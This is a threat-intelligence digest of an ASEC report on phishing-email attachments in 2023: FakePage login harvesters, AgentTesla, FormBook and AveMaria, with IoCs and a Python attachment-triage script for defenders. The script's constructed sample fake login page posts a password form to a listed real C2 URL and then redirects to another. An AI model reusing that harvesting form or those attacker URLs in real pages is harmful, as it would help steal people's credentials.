ASEC analyzes phishing email threats focusing on attachments from May 28th to June 3rd, 2023, highlighting FakePage campaigns, Infostealers, and related malware distribution patterns. The report emphasizes the prevalence of the “Invoice” keyword, the use of various attachment types and C2 URLs, and notes Korean-targeted cases alongside global ones.
#FakePage #AveMaria #AgentTesla #UPS_Korea #DHL
Key points
- Phishing email attachments were the focus; FakePage (listed as FakePageCache) was the most prevalent threat type at 36%.
- Infostealers (AgentTesla, FormBook, AveMaria) were the second most common (27%), followed by Trojan (22%), Downloader (10%), and smaller shares of Exploit, Worm, Backdoor, and Dropper.
- FakePages imitate real login pages to harvest credentials, sending input to the attacker’s C2 server or directing to additional fake sites.
- Malware distributions used attachments with various file extensions; FakePages used HTML/HTM-based pages, while Infostealer/Downloader used compressed files (RAR, ZIP, 7Z, etc.).
- Many cases included Korean-targeted subject lines; some used Korean-language emails and attachments.
- The analysis lists a set of fake login page C2 URLs that victims are directed to, illustrating how credential collection occurs.
- “Invoice” is the subject keyword to watch for; a Turkish-language example used an SCR attachment, with AveMaria being injected into aspnet_compiler.exe.
MITRE Techniques
- [T1598] Phishing for Information – Reconnaissance – The report notes that phishing leaks credentials through social engineering disguises; “phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods.”
- [T1566] Phishing – Initial Access – Phishing emails are designed to deceive users into accessing fake login pages or executing malware; “phishing emails … to induce users to access fake login pages or execute malware.”
- [T1534] Internal Spearphishing – Lateral Movement – The content discusses fake login pages evolving to closely resemble originals, enabling credential theft and movement within systems; “Fake login pages are evolving by the second to closely resemble the original pages.”
Indicators of Compromise
- [URL] Fake login page C2 URLs – https[:]//submit-form[.]com/nv7B93q6, https[:]//www[.]spgiutar[.]com/mmc/fdpxoGur23f[.]php
- [URL] Additional FakePage C2 URLs – http[:]//www[.]miassmebel-neo[.]ru/ZaZa/port25[.]php, https[:]//aphal[.]000webhostapp[.]com/acr/PDF
- [File name] Email attachments used in campaigns – FedEx.html, PO-02-QT-000488 _**********.com.HTM
- [Email Subject] Example FakePage subjects – [FedEx] Tariffs payment notice (Tax Invoice), Booking.com Invoice 8831882301
- [File extension] Uncommon attachment extension observed – SCR
- [Process] Injection target named in the AveMaria case – aspnet_compiler.exe
- [Malware] Infostealer families observed – AveMaria, AgentTesla, FormBook
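As an added example, not code from the ASEC report or from this digest, the following Python routine turns the key points and indicators above into an attachment triage check: it classifies the attachment extension into the categories the digest names (HTML/HTM for FakePages, archives for Infostealer/Downloader carriers, SCR as an uncommon executable), flags the “Invoice” subject keyword, and, for HTML attachments, extracts form actions and script URLs and matches them against the defanged FakePage C2 list from the IoC section. The sample HTML attachment, file names and subject lines are constructed for the demonstration; only the C2 URLs come from the page.

```python
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser

# Defanged FakePage C2 URLs exactly as listed in the ASEC digest above.
FAKEPAGE_C2_DEFANGED = [
    "https[:]//submit-form[.]com/nv7B93q6",
    "https[:]//www[.]spgiutar[.]com/mmc/fdpxoGur23f[.]php",
    "http[:]//www[.]miassmebel-neo[.]ru/ZaZa/port25[.]php",
    "https[:]//aphal[.]000webhostapp[.]com/acr/PDF",
]


def refang(url: str) -> str:
    """Convert a defanged indicator back into a normalised URL for comparison."""
    u = url.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")
    return u.strip().rstrip("/").lower()


FAKEPAGE_C2 = {refang(u) for u in FAKEPAGE_C2_DEFANGED}

# Attachment extension classes the digest associates with each threat type.
FAKEPAGE_EXTS = {"html", "htm"}       # FakePage credential harvesters
ARCHIVE_EXTS = {"rar", "zip", "7z"}   # Infostealer / Downloader carriers
EXECUTABLE_EXTS = {"scr", "exe"}      # SCR noted as an uncommon extension


class UrlSink(HTMLParser):
    """Collect <form action> targets plus absolute URLs in attributes and inline script."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.urls = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        for value in a.values():
            if value and value.lower().startswith(("http://", "https://")):
                self.urls.add(value)

    def handle_data(self, data):
        # Catches redirect targets assigned in <script>, e.g. window.location = "..."
        self.urls.update(re.findall(r"https?://[^\s'\"<>]+", data))


@dataclass
class Verdict:
    filename: str
    ext_class: str
    c2_hits: list = field(default_factory=list)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def classify_ext(filename: str) -> str:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in FAKEPAGE_EXTS:
        return "fakepage-candidate"
    if ext in ARCHIVE_EXTS:
        return "archive"
    if ext in EXECUTABLE_EXTS:
        return "executable"
    return "other"


def triage_attachment(filename: str, content: str, subject: str = "") -> Verdict:
    """Score one attachment using the extension, subject and C2 indicators from the digest."""
    v = Verdict(filename, classify_ext(filename))
    if v.ext_class != "other":
        v.reasons.append(f"attachment extension class: {v.ext_class}")
    if "invoice" in subject.lower():
        v.reasons.append("subject contains the 'Invoice' keyword")
    if v.ext_class == "fakepage-candidate":
        sink = UrlSink()
        sink.feed(content)
        for target in set(sink.form_actions) | sink.urls:
            if refang(target) in FAKEPAGE_C2:
                v.c2_hits.append(target)
        v.c2_hits.sort()
        if v.c2_hits:
            v.reasons.append("form/script target matches a known FakePage C2 URL")
        elif sink.form_actions:
            v.reasons.append("HTML attachment contains a login-style form")
    return v


# Constructed sample: a minimal fake login page whose form posts to a listed C2 and
# whose script then redirects to a second listed URL (nothing is sent anywhere here).
SAMPLE_FAKEPAGE_HTML = """<html><body>
<form method="post" action="https://submit-form.com/nv7B93q6">
  <input name="email"><input name="password" type="password"><button>Sign in</button>
</form>
<script>window.location = "https://www.spgiutar.com/mmc/fdpxoGur23f.php";</script>
</body></html>"""

SAMPLE_BENIGN_HTML = "<html><body><p>Your order has shipped.</p></body></html>"

if __name__ == "__main__":
    for name, body, subj in [
        ("FedEx.html", SAMPLE_FAKEPAGE_HTML, "[FedEx] Tariffs payment notice (Tax Invoice)"),
        ("newsletter.html", SAMPLE_BENIGN_HTML, "Weekly update"),
        ("report.pdf", "", "Monthly report"),
    ]:
        print(triage_attachment(name, body, subj))
```

An HTML attachment is treated as suspicious on extension alone, because the digest ties the HTML/HTM class to FakePages; a C2 match or an embedded form only raises the confidence. The defanged list is normalised through the same `refang` function as the extracted targets, so case differences in paths (the `/acr/PDF` entry, for instance) do not cause misses.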
Read more: https://asec.ahnlab.com/en/54163/